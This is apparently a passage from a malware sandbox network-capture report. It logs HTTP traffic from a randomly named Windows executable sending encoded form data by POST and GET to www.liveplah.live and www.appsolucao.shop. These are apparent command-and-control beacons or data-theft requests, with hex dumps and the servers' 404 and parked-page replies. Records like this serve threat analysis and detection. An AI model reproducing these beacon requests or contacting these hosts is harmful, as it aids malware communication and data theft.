                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID: 14 | Source IP: 192.168.2.8 | Source Port: 49723 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:44:31.821647882 CET | Bytes transferred: 800 | Direction: OUT
                                                                    POST /2bf0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.liveplah.live
                                                                    Origin: http://www.liveplah.live
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.liveplah.live/2bf0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 4d 43 43 64 36 6d 52 4e 54 58 62 71 71 68 55 71 69 42 52 6d 58 31 6e 31 47 43 6d 57 34 32 32 38 76 6e 4d 62 35 58 48 48 59 73 33 49 50 56 44 2f 34 53 74 63 51 53 69 35 79 43 69 2b 49 36 32 36 4d 4e 59 58 65 71 4e 5a 49 4d 76 5a 63 78 79 37 44 64 2b 66 53 53 59 4b 38 7a 4e 57 62 4b 69 61 45 77 4a 71 39 76 61 76 42 6b 47 67 4b 4c 76 58 33 2f 54 45 64 53 43 31 48 7a 35 66 49 46 47 44 46 52 52 2f 58 4c 34 68 48 33 45 59 45 75 4b 6a 4f 48 6b 68 75 32 54 52 33 74 70 34 48 45 36 77 50 70 42 66 63 42 70 4c 4d 34 70 39 2b 4f 4b 4a 48 62 53 62 77 2b 32 67 43 4a 64 61 75 6b 30 59 5a 56 54 4e 44 4a 58 42 49 77 52 72 75 6c 52 49 77 59 37 49 6d 66 35 61 32 42 64
                                                                    Data Ascii: dpy4vDKP=6MCCd6mRNTXbqqhUqiBRmX1n1GCmW4228vnMb5XHHYs3IPVD/4StcQSi5yCi+I626MNYXeqNZIMvZcxy7Dd+fSSYK8zNWbKiaEwJq9vavBkGgKLvX3/TEdSC1Hz5fIFGDFRR/XL4hH3EYEuKjOHkhu2TR3tp4HE6wPpBfcBpLM4p9+OKJHbSbw+2gCJdauk0YZVTNDJXBIwRrulRIwY7Imf5a2Bd
                                                                    Timestamp: Dec 5, 2024 09:44:33.044850111 CET | Bytes transferred: 533 | Direction: IN
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:32 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID: 15 | Source IP: 192.168.2.8 | Source Port: 49724 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:44:34.491868019 CET | Bytes transferred: 1817 | Direction: OUT
                                                                    POST /2bf0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.liveplah.live
                                                                    Origin: http://www.liveplah.live
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.liveplah.live/2bf0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 4d 43 43 64 36 6d 52 4e 54 58 62 71 71 68 55 71 69 42 52 6d 58 31 6e 31 47 43 6d 57 34 32 32 38 76 6e 4d 62 35 58 48 48 59 30 33 50 38 74 44 75 71 36 74 66 51 53 69 77 53 43 6a 2b 49 36 52 36 4d 56 55 58 65 58 36 5a 4b 45 76 59 2f 4a 79 33 69 64 2b 57 53 53 59 44 63 7a 4f 62 37 4b 33 61 46 41 56 71 39 2f 61 76 42 6b 47 67 49 6a 76 44 32 2f 54 43 64 53 42 32 48 7a 31 4f 59 45 72 44 46 5a 76 2f 58 66 43 69 33 58 45 64 55 2b 4b 69 34 62 6b 69 4f 32 52 57 33 74 50 34 48 4a 6b 77 50 31 6a 66 63 46 50 4c 4c 55 70 2f 34 7a 48 5a 6e 72 70 4e 54 53 68 70 79 42 33 56 73 6b 67 65 5a 46 7a 45 30 35 30 4c 2f 35 2f 70 73 56 78 42 43 41 79 66 69 7a 49 65 68 6b 4b 35 49 55 43 42 32 6b 67 43 61 53 35 37 6a 4e 55 5a 71 54 4b 47 2f 55 4a 34 59 53 49 52 45 66 45 4a 67 63 42 4c 6d 41 52 70 4e 64 48 35 72 63 75 37 66 43 37 66 58 71 39 53 61 31 53 75 4c 65 4c 62 51 53 50 36 6f 6b 39 66 54 5a 38 78 70 48 44 62 76 66 77 57 30 55 64 68 33 47 65 4e 63 4a 57 4c 6a 54 42 72 4a 6e 69 51 7a 49 79 72 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP= [TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:44:35.795859098 CET | Bytes transferred: 533 | Direction: IN
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:35 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID: 16 | Source IP: 192.168.2.8 | Source Port: 49725 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:44:37.166523933 CET | Bytes transferred: 518 | Direction: OUT
                                                                    GET /2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.liveplah.live
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:44:38.396351099 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:38 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    17 | 192.168.2.8 | 49726 | 84.32.84.32 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:44:44.084762096 CET | 786 | OUT | POST /qize/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Origin: http://www.appsolucao.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.appsolucao.shop/qize/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 41 54 46 67 78 4a 75 6a 65 54 61 37 75 6b 55 34 66 43 34 59 4d 38 34 6b 48 67 4b 70 48 64 36 59 58 42 76 50 41 7a 39 70 79 6f 57 2b 43 58 62 53 4c 65 53 38 38 6a 6c 6d 71 53 4f 49 41 30 7a 59 64 49 6b 50 68 6d 41 4e 79 52 4b 44 56 57 54 46 48 2b 68 42 65 65 59 41 41 39 65 76 41 62 72 53 51 4f 4f 65 77 4e 31 41 76 59 78 71 79 4c 6d 64 58 34 52 53 49 38 41 79 4e 68 47 5a 4b 65 6c 4c 6c 77 58 69 58 79 31 6f 46 52 72 5a 64 2f 41 38 43 73 57 42 4d 33 75 5a 63 42 79 51 67 35 6d 7a 32 78 51 53 41 55 36 48 73 4c 53 43 70 5a 65 4c 6a 39 6b 44 79 74 4f 4b 79 33 54 75 41 33 44 74 71 49 35 39 35 4e 63 3d
                                                                    Data Ascii: dpy4vDKP=ATFgxJujeTa7ukU4fC4YM84kHgKpHd6YXBvPAz9pyoW+CXbSLeS88jlmqSOIA0zYdIkPhmANyRKDVWTFH+hBeeYAA9evAbrSQOOewN1AvYxqyLmdX4RSI8AyNhGZKelLlwXiXy1oFRrZd/A8CsWBM3uZcByQg5mz2xQSAU6HsLSCpZeLj9kDytOKy3TuA3DtqI595Nc=


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    18 | 192.168.2.8 | 49727 | 84.32.84.32 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:44:46.756191015 CET | 806 | OUT | POST /qize/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Origin: http://www.appsolucao.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.appsolucao.shop/qize/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 41 54 46 67 78 4a 75 6a 65 54 61 37 76 46 6b 34 54 46 6b 59 64 63 34 6e 49 41 4b 70 4e 39 36 63 58 42 6a 50 41 78 52 35 79 64 47 2b 44 33 72 53 4b 62 6d 38 2f 6a 6c 6d 67 79 50 43 45 30 7a 54 64 49 59 39 68 6e 38 4e 79 52 32 44 56 58 6a 46 48 4a 4e 43 50 65 59 47 4d 64 65 70 45 62 72 53 51 4f 4f 65 77 4a 64 71 76 62 42 71 79 36 57 64 57 61 35 56 45 63 41 31 45 42 47 5a 63 75 6c 50 6c 77 58 55 58 7a 70 4f 46 58 6e 5a 64 2b 77 38 44 2b 2b 43 62 48 75 66 59 42 7a 53 6c 59 66 41 37 53 63 73 42 58 6d 47 6f 72 65 47 6f 76 76 68 35 66 73 46 78 74 6d 68 79 30 37 59 46 41 65 46 77 72 70 4e 6e 61 49 76 61 56 74 62 66 74 43 48 30 70 31 76 6d 32 55 4a 43 39 61 46
                                                                    Data Ascii: dpy4vDKP=ATFgxJujeTa7vFk4TFkYdc4nIAKpN96cXBjPAxR5ydG+D3rSKbm8/jlmgyPCE0zTdIY9hn8NyR2DVXjFHJNCPeYGMdepEbrSQOOewJdqvbBqy6WdWa5VEcA1EBGZculPlwXUXzpOFXnZd+w8D++CbHufYBzSlYfA7ScsBXmGoreGovvh5fsFxtmhy07YFAeFwrpNnaIvaVtbftCH0p1vm2UJC9aF


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    19 | 192.168.2.8 | 49728 | 84.32.84.32 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:44:49.414539099 CET | 1823 | OUT | POST /qize/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Origin: http://www.appsolucao.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.appsolucao.shop/qize/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 41 54 46 67 78 4a 75 6a 65 54 61 37 76 46 6b 34 54 46 6b 59 64 63 34 6e 49 41 4b 70 4e 39 36 63 58 42 6a 50 41 78 52 35 79 64 4f 2b 43 47 4c 53 46 63 36 38 2b 6a 6c 6d 2b 69 50 44 45 30 7a 30 64 49 42 32 68 6e 77 37 79 55 36 44 48 68 58 46 46 34 4e 43 57 4f 59 47 52 4e 65 73 41 62 71 49 51 4f 2b 61 77 4e 42 71 76 62 42 71 79 35 4f 64 66 6f 52 56 43 63 41 79 4e 68 47 56 4b 65 6c 72 6c 77 50 45 58 7a 74 34 46 6e 48 5a 64 65 67 38 46 4e 57 43 5a 6e 75 64 57 68 7a 77 6c 5a 6a 66 37 53 41 67 42 55 37 6a 6f 70 4f 47 71 65 58 34 74 4e 59 38 72 38 57 68 79 47 58 5a 45 51 4b 79 79 39 6b 2b 6c 4c 30 7a 53 52 68 42 65 73 4b 4b 2b 62 55 6a 35 48 6f 59 48 4b 54 62 6e 51 51 7a 71 65 50 32 62 4d 4c 53 2b 4b 6d 62 54 58 61 43 6d 4a 4a 6b 44 32 4d 61 75 52 58 4f 47 4d 5a 55 34 42 33 2f 38 65 32 46 50 46 58 35 50 32 72 37 6b 6d 46 46 47 6d 4a 6e 66 64 4a 4f 79 35 4c 30 67 68 77 45 44 6a 61 30 4a 71 57 67 31 30 6d 75 54 48 39 44 33 39 4e 74 59 31 46 4c 75 51 38 4b 30 68 35 38 77 42 59 57 45 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=ATFgxJujeTa7vFk4TFkYdc4nIAKpN96cXBjPAxR5ydO+CGLSFc68+jlm+iPDE0z0dIB2hnw7yU6DHhXFF4NCWOYGRNesAbqIQO+awNBqvbBqy5OdfoRVCcAyNhGVKelrlwPEXzt4FnHZdeg8FNWCZnudWhzwlZjf7SAgBU7jopOGqeX4tNY8r8WhyGXZEQKyy9k+lL0zSRhBesKK+bUj5HoYHKTbnQQzqeP2bMLS+KmbTXaCmJJkD2MauRXOGMZU4B3/8e2FPFX5P2r7kmFFGmJnfdJOy5L0ghwEDja0JqWg10muTH9D39NtY1FLuQ8K0h58wBYWElR9kzIeUL6xKB3iPSuVoxeEJqbkSc/qje6h9mHsvwhFxtco5tAHfBAxuMxFYXx4859GiAdsccQyDlgsGQ1qlJvtj2Vho5H7IfvPZ8mnJGNCOAO/XGZh2IVI+txp3CgLCNaFykNfrR4jiw3gEp9eHbmUPuPSk7kE8KKKw/kkYhC4TFTTc+6wvtkzESUIPEGFB/1mpFjYcRMmdenGC1jLAefekbEynLTdI57V2X+8/akfg0TeYSaOqpgwCw9ZogHWtuV7YiM69nHr+uFPefzESqhLI8ycY4fY+V7QVWNZvAu1CDtcxLQq7ReqJAQo4cTw7dp0UWuhVE+Q1p+ETFvkUCp2r7ry5Dpc4nCTzYJp9UGuNtTzqLs8g+fSvqW+3cxHkesrv0PbIGKCiHl5tkb2Z3F7p2gdRtXZH//V2Aj33/It5eFHWWiFCAVfLsewamvuXXWr3USOt2GbP6Fj0QD+e6cZgDyNzGuZrIB+bUTjqJGzfURgmGj/Uc7SPNBSX+KTVt3pdWSGfpIxP6wV9KbwXtQs0R47UAe2V9ciU1CZRcLalNnbnuz+PtGzApSkAUBgOogAJB2Ytfh2RzTHqaE69VNdHxq3xF9wF6QysW7JgOz6Ynkx3TULKX9ExQzepZsV9HOtUV8MGRyooPbFGV5xubotL8Ko43JvLR+ [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    20 | 192.168.2.8 | 49729 | 84.32.84.32 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:44:52.082525015 CET | 520 | OUT | GET /qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.appsolucao.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:44:53.167207003 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Thu, 05 Dec 2024 08:44:53 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 9de55f1c1d40b506406ccd9cbe953fb1-bos-edge1
                                                                    Expires: Thu, 05 Dec 2024 08:44:52 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
